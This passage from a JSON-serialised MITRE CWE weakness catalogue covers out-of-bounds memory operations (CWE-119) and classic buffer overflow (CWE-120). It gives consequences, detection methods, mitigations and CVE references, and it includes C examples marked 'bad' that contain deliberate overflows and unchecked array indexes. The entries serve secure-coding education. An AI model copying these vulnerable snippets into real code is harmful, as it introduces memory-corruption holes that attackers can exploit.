security-critical application-specific data -- such as a flag indicating whether the user is an administrator."},{"Scope":["Availability","Confidentiality"],"Impact":["Read Memory","DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)"],"Note":"Out of bounds memory access will very likely result in the corruption of relevant memory, and perhaps instructions, possibly leading to a crash. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop."},{"Scope":"Confidentiality","Impact":"Read Memory","Note":"In the case of an out-of-bounds read, the attacker may have access to sensitive information. If the sensitive information contains system details, such as the current buffers position in memory, this knowledge can be used to craft further attacks, possibly with more severe consequences."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-1"},"Method":"Automated Static Analysis","Description":{"xhtml:p":["This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives.","Automated static analysis generally does not account for environmental considerations when reporting out-of-bounds memory operations. This can make it difficult for users to determine which warnings should be investigated first. For example, an analysis tool might report buffer overflows that originate from command line arguments in a program that is not expected to run with setuid or other special privileges."]},"Effectiveness":"High","Effectiveness_Notes":"Detection techniques for buffer-related errors are more mature than for most other weakness types."},{"attr":{"@_Detection_Method_ID":"DM-2"},"Method":"Automated Dynamic Analysis","Description":"This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results."},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Binary / Bytecode Quality Analysis","Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Source Code Quality Analyzer"}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-3"},"Phase":"Requirements","Strategy":"Language Selection","Description":{"xhtml:p":["Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, many languages that perform their own memory management, such as Java and Perl, are not subject to buffer overflows. Other languages, such as Ada and C#, typically provide overflow protection, but the protection can be disabled by the programmer.","Be wary that a language\'s interface to native code may still be subject to overflows, even if the language itself is theoretically safe."]}},{"attr":{"@_Mitigation_ID":"MIT-4.1"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","Examples include the Safe C String Library (SafeStr) by Messier and Viega [REF-57], and the Strsafe.h library from Microsoft [REF-56]. These libraries provide safer versions of overflow-prone string-handling functions."]},"Effectiveness_Notes":"This is not a complete solution, since many buffer overflows are not related to strings."},{"attr":{"@_Mitigation_ID":"MIT-10"},"Phase":"Build and Compilation","Strategy":"Compilation or Build Hardening","Description":{"xhtml:p":["Run or compile the software using features or extensions that automatically provide a protection mechanism that mitigates or eliminates buffer overflows.","For example, certain compilers and extensions provide automatic buffer overflow detection mechanisms that are built into the compiled code. Examples include the Microsoft Visual Studio /GS flag, Fedora/Red Hat FORTIFY_SOURCE GCC flag, StackGuard, and ProPolice."]},"Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not necessarily a complete solution, since these mechanisms can only detect certain types of overflows. In addition, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-9"},"Phase":"Implementation","Description":{"xhtml:p":"Consider adhering to the following rules when allocating and managing an application\'s memory:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Double check that the buffer is as large as specified.","When using functions that accept a number of bytes to copy, such as strncpy(), be aware that if the destination buffer size is equal to the source buffer size, it may not NULL-terminate the string.","Check buffer boundaries if accessing the buffer in a loop and make sure there is no danger of writing past the allocated space.","If necessary, truncate all input strings to a reasonable length before passing them to the copy and concatenation functions."]}}}},{"attr":{"@_Mitigation_ID":"MIT-11"},"Phase":"Operation","Strategy":"Environment Hardening","Description":{"xhtml:p":["Run or compile the software using features or extensions that randomly arrange the positions of a program\'s executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent an attacker from reliably jumping to exploitable code.","Examples include Address Space Layout Randomization (ASLR) [REF-58] [REF-60] and Position-Independent Executables (PIE) [REF-64]."]},"Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not a complete solution. However, it forces the attacker to guess an unknown value that changes every program execution. In addition, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-12"},"Phase":"Operation","Strategy":"Environment Hardening","Description":"Use a CPU and operating system that offers Data Execution Protection (NX) or its equivalent [REF-60] [REF-61].","Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not a complete solution, since buffer overflows could be used to overwrite nearby variables to modify the software\'s state in dangerous ways. In addition, it cannot be used in cases in which self-modifying code is required. Finally, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-13"},"Phase":"Implementation","Description":"Replace unbounded copy functions with analogous functions that support length arguments, such as strcpy with strncpy. Create these if they are not available.","Effectiveness":"Moderate","Effectiveness_Notes":"This approach is still susceptible to calculation errors, including issues such as off-by-one errors (CWE-193) and incorrectly calculating buffer lengths (CWE-131)."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-1"},"Intro_Text":"This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void host_lookup(char *user_supplied_addr){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"struct hostent *hp;in_addr_t *addr;char hostname[64];in_addr_t inet_addr(const char *cp);validate_addr_form(user_supplied_addr);addr = inet_addr(user_supplied_addr);hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);strcpy(hostname, hp->h_name);","xhtml:br":["","","","","","","","","",""],"xhtml:i":"/*routine that ensures user_supplied_addr is in the right format for conversion */"}}}},"Body_Text":["This function allocates a buffer of 64 bytes to store the hostname, however there is no guarantee that the hostname will not be larger than 64 bytes. If an attacker specifies an address which resolves to a very large hostname, then the function may overwrite sensitive data or even relinquish control flow to the attacker.","Note that this example also contains an unchecked return value (CWE-252) that can lead to a NULL pointer dereference (CWE-476)."]},{"attr":{"@_Demonstrative_Example_ID":"DX-19"},"Intro_Text":"This example applies an encoding procedure to an input string and stores it into a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char * copy_input(char *user_supplied_string){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int i, dst_index;char *dst_buf = (char*)malloc(4*sizeof(char) * MAX_SIZE);if ( MAX_SIZE <= strlen(user_supplied_string) ){}dst_index = 0;for ( i = 0; i < strlen(user_supplied_string); i++ ){}return dst_buf;","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"die(\\"user string too long, die evil hacker!\\");","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if( \'&\' == user_supplied_string[i] ){}else if (\'<\' == user_supplied_string[i] ){}else dst_buf[dst_index++] = user_supplied_string[i];","xhtml:div":[{"#text":"dst_buf[dst_index++] = \'&\';dst_buf[dst_index++] = \'a\';dst_buf[dst_index++] = \'m\';dst_buf[dst_index++] = \'p\';dst_buf[dst_index++] = \';\';","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"/* encode to &lt; */"}}],"xhtml:br":["",""]}}]}}}},"Body_Text":"The programmer attempts to encode the ampersand character in the user-controlled string, however the length of the string is validated before the encoding procedure is applied. Furthermore, the programmer assumes encoding expansion will only expand a given character by a factor of 4, while the encoding of the ampersand expands by 5. As a result, when the encoding procedure expands the string it is possible to overflow the destination buffer if the attacker provides a string of many ampersands."},{"attr":{"@_Demonstrative_Example_ID":"DX-90"},"Intro_Text":"The following example asks a user for an offset into an array to select an item.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int main (int argc, char **argv) {}","xhtml:br":"","xhtml:div":{"#text":"char *items[] = {\\"boat\\", \\"car\\", \\"truck\\", \\"train\\"};int index = GetUntrustedOffset();printf(\\"You selected %s\\\\n\\", items[index-1]);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"The programmer allows the user to specify which element in the list to select, however an attacker can provide an out-of-bounds offset, resulting in a buffer over-read (CWE-126)."},{"attr":{"@_Demonstrative_Example_ID":"DX-100"},"Intro_Text":"In the following code, the method retrieves a value from an array at a specific array index location that is given as an input parameter to the method","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int getValueFromArray(int *array, int len, int index) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int value;if (index < len) {}else {}return value;","xhtml:br":["","","","","","","","","","","",""],"xhtml:i":["// check that the array index is less than the maximum","// length of the array","// if array index is invalid then output error message","// and return value indicating error"],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"value = array[index];","xhtml:br":["",""],"xhtml:i":"// get the value at the specified index of the array"}},{"#text":"printf(\\"Value is: %d\\\\n\\", array[index]);value = -1;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"...if (index >= 0 && index < len) {...","xhtml:br":["","","","","","","",""],"xhtml:i":["// check that the array index is within the correct","// range of values for the array"]}}],"Body_Text":"However, this method only verifies that the given array index is less than the maximum length of the array but does not check for the minimum value (CWE-839). This will allow a negative value to be accepted as the input array index, which will result in a out of bounds read (CWE-125) and may allow access to sensitive memory. The input array index should be checked to verify that is within the maximum and minimum range required for the array (CWE-129). In this example the if statement should be modified to include a minimum range check, as shown below."},{"Intro_Text":"Windows provides the _mbs family of functions to perform various operations on multibyte strings. When these functions are passed a malformed multibyte string, such as a string containing a valid leading byte followed by a single null byte, they can read or write past the end of the string buffer causing a buffer overflow. The following functions all pose a risk of buffer overflow: _mbsinc _mbsdec _mbsncat _mbsncpy _mbsnextc _mbsnset _mbsrev _mbsset _mbsstr _mbstok _mbccpy _mbslen"}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-2550","Description":"Classic stack-based buffer overflow in media player using a long entry in a playlist","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2550"},{"Reference":"CVE-2009-2403","Description":"Heap-based buffer overflow in media player using a long entry in a playlist","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2403"},{"Reference":"CVE-2009-0689","Description":"large precision value in a format string triggers overflow","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0689"},{"Reference":"CVE-2009-0690","Description":"negative offset value leads to out-of-bounds read","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0690"},{"Reference":"CVE-2009-1532","Description":"malformed inputs cause accesses of uninitialized or previously-deleted objects, leading to memory corruption","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1532"},{"Reference":"CVE-2009-1528","Description":"chain: lack of synchronization leads to memory corruption","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1528"},{"Reference":"CVE-2021-29529","Description":"Chain: machine-learning product can have a heap-based\\n\\t buffer overflow (CWE-122) when some integer-oriented bounds are\\n\\t calculated by using ceiling() and floor() on floating point values\\n\\t (CWE-1339)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29529"},{"Reference":"CVE-2009-0558","Description":"attacker-controlled array index leads to code execution","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0558"},{"Reference":"CVE-2009-0269","Description":"chain: -1 value from a function call was intended to indicate an error, but is used as an array index instead.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0269"},{"Reference":"CVE-2009-0566","Description":"chain: incorrect calculations lead to incorrect pointer dereference and memory corruption","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0566"},{"Reference":"CVE-2009-1350","Description":"product accepts crafted messages that lead to a dereference of an arbitrary pointer","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1350"},{"Reference":"CVE-2009-0191","Description":"chain: malformed input causes dereference of uninitialized memory","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0191"},{"Reference":"CVE-2008-4113","Description":"OS kernel trusts userland-supplied length value, allowing reading of sensitive information","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4113"},{"Reference":"CVE-2005-1513","Description":"Chain: integer overflow in securely-coded mail program leads to buffer overflow. In 2005, this was regarded as unrealistic to exploit, but in 2020, it was rediscovered to be easier to exploit due to evolutions of the technology.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1513"},{"Reference":"CVE-2003-0542","Description":"buffer overflow involving a regular expression with a large number of captures","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0542"},{"Reference":"CVE-2017-1000121","Description":"chain: unchecked message size metadata allows integer overflow (CWE-190) leading to buffer overflow (CWE-119).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000121"}]},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A5","Entry_Name":"Buffer Overflows","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR00-C","Entry_Name":"Understand how arrays work"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR30-C","Entry_Name":"Do not form or use out-of-bounds pointers or array subscripts","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR38-C","Entry_Name":"Guarantee that library functions do not form invalid pointers","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ENV01-C","Entry_Name":"Do not make assumptions about the size of an environment variable"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP39-C","Entry_Name":"Do not access a variable through a pointer of an incompatible type","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO37-C","Entry_Name":"Do not assume character data has been read"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR31-C","Entry_Name":"Guarantee that storage for strings has sufficient space for character data and the null terminator","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR32-C","Entry_Name":"Do not pass a non-null-terminated character sequence to a library function that expects a string","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":7,"Entry_Name":"Buffer Overflow"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"10"}},{"attr":{"@_CAPEC_ID":"100"}},{"attr":{"@_CAPEC_ID":"123"}},{"attr":{"@_CAPEC_ID":"14"}},{"attr":{"@_CAPEC_ID":"24"}},{"attr":{"@_CAPEC_ID":"42"}},{"attr":{"@_CAPEC_ID":"44"}},{"attr":{"@_CAPEC_ID":"45"}},{"attr":{"@_CAPEC_ID":"46"}},{"attr":{"@_CAPEC_ID":"47"}},{"attr":{"@_CAPEC_ID":"8"}},{"attr":{"@_CAPEC_ID":"9"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1029"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 5, "Public Enemy #1: The Buffer Overrun" Page 127; Chapter 14, "Prevent I18N Buffer Overruns" Page 441"}},{"attr":{"@_External_Reference_ID":"REF-56"}},{"attr":{"@_External_Reference_ID":"REF-57"}},{"attr":{"@_External_Reference_ID":"REF-58"}},{"attr":{"@_External_Reference_ID":"REF-59"}},{"attr":{"@_External_Reference_ID":"REF-60"}},{"attr":{"@_External_Reference_ID":"REF-61"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 5, "Memory Corruption", Page 167"}},{"attr":{"@_External_Reference_ID":"REF-64"}}]},"Notes":{"Note":{"attr":{"@_Type":"Applicable Platform"},"xhtml:p":"It is possible in any programming languages without memory management support to attempt an operation outside of the bounds of a memory buffer, but the consequences will vary widely depending on the language, platform, and chip architecture."}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Likelihood_of_Exploit, Name, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Relationships, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Detection_Factors, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Demonstrative_Examples, Detection_Factors, Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Alternate_Terms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Alternate_Terms, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Potential_Mitigations, Relationships"}],"Previous_Entry_Name":[{"#text":"Buffer Errors","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Constrain Operations within the Bounds of an Allocated Memory Buffer","attr":{"@_Date":"2009-01-12"}},{"#text":"Failure to Constrain Operations within the Bounds of a Memory Buffer","attr":{"@_Date":"2010-12-13"}}]}},"120":{"attr":{"@_ID":"120","@_Name":"Buffer Copy without Checking Size of Input (\'Classic Buffer Overflow\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The program copies an input buffer to an output buffer without verifying that the size of the input buffer is less than the size of the output buffer, leading to a buffer overflow.","Extended_Description":"A buffer overflow condition exists when a program attempts to put more data in a buffer than it can hold, or when a program attempts to put data in a memory area outside of the boundaries of a buffer. The simplest type of error, and the most common cause of buffer overflows, is the \\"classic\\" case in which the program copies the buffer without restricting how much is copied. Other variants exist, but the existence of a classic overflow strongly suggests that the programmer is not considering even the most basic of security protections.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"123","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Resultant"},{"Ordinality":"Primary"}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Assembly","@_Prevalence":"Undetermined"}}]},"Alternate_Terms":{"Alternate_Term":[{"Term":"Classic Buffer Overflow","Description":"This term was frequently used by vulnerability researchers during approximately 1995 to 2005 to differentiate buffer copies without length checks (which had been known about for decades) from other emerging weaknesses that still involved invalid accesses of buffers, as vulnerability researchers began to develop advanced exploitation techniques."},{"Term":"Unbounded Transfer"}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Modify Memory","Execute Unauthorized Code or Commands"],"Note":"Buffer overflows often can be used to execute arbitrary code, which is usually outside the scope of a program\'s implicit security policy. This can often be used to subvert any other security service."},{"Scope":"Availability","Impact":["Modify Memory","DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)"],"Note":"Buffer overflows generally lead to crashes. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-1"},"Method":"Automated Static Analysis","Description":{"xhtml:p":["This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives.","Automated static analysis generally does not account for environmental considerations when reporting out-of-bounds memory operations. This can make it difficult for users to determine which warnings should be investigated first. For example, an analysis tool might report buffer overflows that originate from command line arguments in a program that is not expected to run with setuid or other special privileges."]},"Effectiveness":"High","Effectiveness_Notes":"Detection techniques for buffer-related errors are more mature than for most other weakness types."},{"attr":{"@_Detection_Method_ID":"DM-2"},"Method":"Automated Dynamic Analysis","Description":"This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results."},{"attr":{"@_Detection_Method_ID":"DM-9"},"Method":"Manual Analysis","Description":"Manual analysis can be useful for finding this weakness, but it might not achieve desired code coverage within limited time constraints. This becomes difficult for weaknesses that must be considered for all inputs, since the attack surface can be too large."},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness 